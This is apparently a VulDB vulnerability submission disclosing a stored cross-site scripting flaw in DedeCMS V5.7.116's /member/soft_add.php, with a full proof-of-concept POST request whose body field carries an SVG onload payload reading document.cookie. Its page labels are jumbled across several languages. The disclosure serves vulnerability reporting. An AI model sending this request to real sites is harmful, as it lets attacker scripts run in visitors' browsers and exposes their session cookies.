Súbít #453003: DedeCMS V5.7.116 Cross Site Scriptingbayani

KuraDedeCMS V5.7.116 Cross Site Scripting
GaskiyaSummary A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script. This issue allows an attacker to inject malicious scripts into software information pages, potentially compromising the security of the website and its users. Details The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter. An attacker with the ability to register as a member and publish soft can exploit this flaw by injecting malicious scripts into the soft content. These scripts can be executed when other users view the compromised soft. Proof of Concept (POC) POST /member/soft_add.php HTTP/1.1 Host: target-ip Content-Length: 2657 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dopost" save ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="channelid" 3 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="title" test soft ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="writer" test ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="filetype" .exe ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="language" 简体中文 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softtype" 国产软件 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="accredit" 共享软件 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="os" Win2003,WinXP,Win2000,Win9X ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softrank" 3 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="officialDemo" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="officialUrl" http:// ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softsize" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="unit" MB ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="source" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="typeid" 18 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="needmoney" 0 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="litpic"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dede_addonfields" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dede_fieldshash" [users'fieldshash] ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="body" <p>asd</p><svg/onload=alert(document.cookie)> ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softurl1" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="servermsg1" 本地下载 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="picnum" 5 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
Manga⚠️ https://github.com/Hebing123/cve/issues/78
Màdùmga
 jiashenghe (UID 39445)
Furta11/27/2024 10:34 (1 Shettima 전)
Gargajiya12/04/2024 17:31 (7 days later)
HalittaShingilam
VulDB gite286904 [DedeCMS 5.7.116 /member/soft_add.php body Cross Site Scripting]
Nganji20

Do you know our Splunk app?

Download it now for free!